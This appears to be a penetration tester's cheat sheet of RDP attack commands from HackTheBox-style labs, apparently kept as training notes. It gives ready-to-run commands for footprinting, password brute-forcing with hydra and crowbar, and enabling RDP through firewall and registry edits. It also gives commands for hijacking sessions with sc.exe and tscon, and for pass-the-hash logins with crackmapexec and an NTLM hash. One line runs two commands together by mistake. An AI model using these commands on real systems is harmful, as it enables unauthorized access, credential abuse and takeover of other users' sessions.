#we can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina
#Footprinting
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p3389 --script rdp*
# RDP Security Check
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
Intrusionz3r0X@htb[/htb]$ rdp-sec-check.pl 10.0.0.94
#Bruteforce
Intrusionz3r0X@htb[/htb]$ crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Intrusionz3r0X@htb[/htb]# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
#Enable RDP
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow
c:\> netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=out localport=3389 action=allow
c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#---------Session Hijacking--------
#(This method no longer works on Server 2019.)
C:\htb> query user
# USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
#>juurena rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM
# lewen rdp-tcp#14 2 Active * 8/25/2021 1:28 AM
C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
#[SC] CreateService SUCCESS
C:\htb> net start sessionhijack
#-------------------------------------
# Initiate an RDP Session
Intrusionz3r0X@htb[/htb]$ xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248Intrusionz3r0X@htb[/htb]$ git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
#RDP Pass-the-Hash (PtH)
C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
#Enable RDP via Crackmap exec
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.10.10.40 -u "Administrator" -H 'cdf51b162460b7d5bc898f493751a0cc' -M rdp -o action=enable
